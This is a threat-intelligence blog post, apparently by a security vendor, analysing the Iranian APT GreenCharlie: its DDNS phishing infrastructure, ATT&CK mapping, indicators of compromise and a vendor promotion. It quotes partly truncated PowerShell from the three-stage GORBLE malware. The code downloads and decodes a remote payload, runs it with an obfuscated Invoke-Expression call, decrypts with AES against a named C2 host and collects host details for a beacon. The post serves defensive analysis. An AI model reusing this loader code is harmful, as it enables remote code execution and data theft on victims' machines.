GreenCharlie APT: Iran’s PowerShell-Based Cyber Espionage Campaigns

GreenCharlie is an Iran-based advanced persistent threat (APT) group known for its active cyber-espionage and phishing operations. The group has been active since at least 2020 [1] and continues to operate as of late 2024. GreenCharlie demonstrates a sophisticated understanding of network infrastructure management, leveraging commercial domain registrars and dynamic DNS (DDNS) services to enable rapid infrastructure turnover and maintain operational stealth.

Beginning in May 2024, the group significantly expanded its infrastructure footprint, registering a large number of DDNS domains likely intended for targeted phishing campaigns. These domains were often themed around legitimate services such as cloud platforms, document editors, and authentication portals—examples include activeeditor[.]info, webviewerpage[.]info, and documentcloudeditor.ddnsgeek[.]com. Throughout July and August 2024, Iranian IP addresses were observed communicating with GreenCharlie-controlled servers over distinctive ports, suggesting active operations.

GreenCharlie’s toolset centers on a multi-stage PowerShell-based malware framework, including variants known as GORBLE, TAMECAT, and POWERSTAR. These tools employ advanced obfuscation, layered decryption, and in-memory execution to evade detection. Their staged architecture includes a downloader/decoder, an AES-based decryptor/executor (using functions like KeyMaster or Borjol), and a command-and-control (C2) beacon that exfiltrates host information. The group’s use of obfuscation techniques such as Base64 encoding combined with bitwise operations and the substitution of standard execution methods (e.g., replacing Invoke-Expression with ScriptBlock.Create) demonstrates an evolving sophistication in evading static and behavioral detection systems.

In this post, we will examine GreenCharlie’s known history, review their infrastructure-centric operations, and detail their PowerShell-based, multi-stage malware campaigns (GORBLE, TAMECAT, POWERSTAR). We’ll break down the group’s TTPs and finish by showing how Picus can help detect, test, and harden defenses against this group.

Simulate APT Attacks with 14-Day Free Trial of Picus Platform

History & Major Activities of GreenCharlie Group

May 2024 – The group began registering a large number of dynamic DNS (DDNS) domains, likely used for targeted phishing operations [1].

July - August 2024 - Iran-based IP addresses were observed communicating with GreenCharlie’s infrastructure over distinct ports, indicating active use of their network for operations [1].

August 2024 – Details about GreenCharlie’s infrastructure have been publicly disclosed. The group remains highly active, and while no direct evidence indicates targeting of the U.S. government or political parties, the likelihood of attacks using the identified infrastructure is considered elevated [1].

ATT&CK Mapping (TTPs) of GreenCharlie Group

Tactic: Resource Development

T1583.001 Acquire Infrastructure: Domains

Adversaries acquire domains that can be used during targeting for various purposes, such as phishing or command and control. The group utilizes the commercial registrar Namecheap to register domains that are thematically aligned with their social engineering lures, employing keywords related to cloud platforms, file sharing services, document visualization services, video conferencing, and authentication-themed domains. These keywords include "cloud", "uptimezone", "doceditor", "joincloud", and "pageviewer". They also used .info, .xyz, .icu, .network, .online, and .site as TLDs. Example domains used by GreenCharlie are given below [1]:

activeeditor[.]info
webviewerpage[.]info
Onlinecloudzone[.]info
chatsynctransfer[.]info

Tactic: Initial Access

T1566.002 Phishing: Spearphishing Link

The domain documentcloudeditor.ddnsgeek[.]com, which resolved to 38.180.146[.]174, was observed hosting a PhishTest portal. The portal’s exact purpose remains unclear, but plausible uses include facilitating attack operations, supporting threat actor training, or serving as a platform for Iran-based security awareness exercises [1].

Tactic: Execution

T1059.001 Command and Scripting Interpreter: PowerShell

The entire GORBLE, TAMECAT, and POWERSTAR malware family is constructed as a multi-stage PowerShell execution chain.

The malware's execution chain is deliberately complex and obfuscated across three primary stages [1]:

Stage 1 - Downloader and Decoder:

The initial script is responsible for fetching the second stage. It decodes a hardcoded URL and downloads the next payload. To evade static analysis, the script that is downloaded is not the final payload but rather another PowerShell function. This function, named either KeyMaster or Borjol, is revealed through a two-step decoding process: a standard Base64 decoding followed by a bitwise NOT operation on every byte of the result. This layered obfuscation is designed to break simple decoding tools and signatures that only look for Base64-encoded content.

Stage 2 - Decrypter and Executor:

The KeyMaster or Borjol function from Stage 1 contains the logic to decrypt the final payload. It uses the Advanced Encryption Standard (AES) algorithm with a hard-coded key and initialization vector (IV) to decrypt an embedded data blob from the first stage. The method used to execute the decrypted payload varies slightly between the malware variants, revealing an evolution in the actor's tradecraft. The TAMECAT and POWERSTAR variants use the Invoke-Expression cmdlet (commonly aliased as iex), a powerful but widely monitored method for executing code from a string. In contrast, the GORBLE variant uses ScriptBlock.Create, a more subtle alternative that achieves the same outcome but may evade detection rules specifically targeting Invoke-Expression.

Stage 3 - C2 Beacon:

Once the final payload is decrypted and executed in memory, it performs its initial communication with the C2 server. It gathers basic system information—specifically, the victim's operating system and computer name. This data is formatted into a JSON structure, encrypted using AES, Base64-encoded, and finally transmitted to the C2 server via an HTTP POST request.

Below are the code parts of the three stages of the GORBLE malware [1]:

First Stage:

function Gorba {
param($Ste12)
$wc = New-Object System.Net.WebClient;
$wc.Headers['User-Agent'] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Ch<…>"
while (1) {
try {
$OutRes = $wc.downloadString((bbsert 'iltaHR0cHM6Ly9taXhlZGludGVnZXJsaW5lYXIuYmFyYmFyYS1kZC1wYWRyb24ud<…>'
break
}
catch {
Start-Sleep -s 8;
Continue
}
};
$bytesOfRes = [Convert]::FromBase64String($OutRes);
for ($i = 0; $i -lt $bytesOfRes.Length; $i++) {
$bytesOfRes[$i] = [Convert]::ToByte(([Convert]::ToString(-bnot $bytesOfRes[$i]), 2).SubString(24, 8), 2)
};
$LastEx = [System.Text.Encoding]::UTF8.GetString($bytesOfRes);
&(gcm *v?k?-?x?re*).name $LastEx;
Keymaster "$Ste12"
}

Second Stage:

function Keymaster {
param($text)

$global:destination = "https://translatorupdater.dns-dynamic.net"
$global:address = ""
$global:nelson = "eBpcnCbqfARChSwhvihBbiGCUYrhXBTU"

$iv = "fourfourfour"
$key = $global:nelson

$encryptedBytes = [System.Convert]::FromBase64String($text)
$ivBytes = [text.encoding]::UTF8.GetBytes($iv)
$keyBytes = [text.encoding]::UTF8.GetBytes($key)

$AES = New-Object System.Security.Cryptography.AesCryptoServiceProvider
$AES.Mode = [System.Security.Cryptography.CipherMode]::CBC

$AES.KeySize = 256
$AES.BlockSize = 128
$AES.Key = $keyBytes
$AES.IV = $ivBytes

$decryptor = $AES.CreateDecryptor()
$decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length)
$decryptedString = [System.Text.Encoding]::UTF8.GetString($decryptedBytes)
$decryptedString = $decryptedString.Replace("____dest____", "$global:destination")
$decryptedString = $decryptedString.Replace("____add____", "$global:address")
$decryptedString = $decryptedString.Replace("____nel____", "$global:nelson")
& ([Scriptblock]::Create($decryptedString))
}

Third Stage:

$rtbvvtbgwsokffo = (Get-WmiObject -class Win32_OperatingSystem).Caption + " Enc"
$axumgzbrhjkul = '{"rwsdjfxsdf":[{"num":"' + $ngyapessafpeq + '"},
("OS":"' + $rtbvvtbgwsokffo + '")},
("ComputerName":"' + $env:COMPUTERNAME + '"},
("Token":"' + $ahlqorujlgkgf + '"}]}';

Tactic: Command and Control

T1568 Dynamic Resolution

GreenCharlie leveraged dynamic DNS (DDNS) to establish and manage its infrastructure, registering domains across multiple DDNS providers. It employed services such as Dynu, DNSEXIT, Vitalwerks, Cloud DNS, FreeDNS, and Dia Systems for this purpose. This approach enabled quick rotation or reconfiguration of infrastructure components while maintaining operational continuity. Example DDNS domains used by GreenCharlie are given below [1]:

Documentcloudeditor.ddnsgeek[.]com
Coldwarehexahash.dns-dynamic[.]net
Uptime-timezone.dns-dynamic[.]net
translatorupdater.dns-dynamic[.]net

T1665 Hide Infrastructure

Network telemetry showed consistent communication between GreenCharlie infrastructure and IP addresses linked to ProtonVPN and Proton Mail, including 185.159.159[.]140, 185.70.42[.]45, 185.159.159[.]148, 185.70.42[.]37, 149.22.84[.]139, 146.70.174[.]66, 146.70.194[.]50, and 169.150.226[.]161. The group has also been seen leveraging other VPN services, such as ExpressVPN and PIA, reflecting a broader pattern among Iranian advanced persistent threats to mask operational traffic [1]. These behaviors indicate a deliberate effort to conceal operational activities behind privacy services.

How Picus Simulates GreenCharlie Attacks?

We also strongly suggest simulating GreenCharlie Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for GreenCharlie:

Threat ID	Threat Name	Attack Module
37212	GreenCharlie Threat Group Campaign Malware Email Threat	Network Infiltration
47388	GreenCharlie Threat Group Campaign Malware Download Threat	Network Infiltration

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

References

[1] "GreenCharlie infrastructure linked to US political campaign targeting." Accessed: Oct. 24, 2025. [Online]. Available: https://assets.recordedfuture.com/insikt-report-pdfs/2024/cta-ir-2024-0820.pdf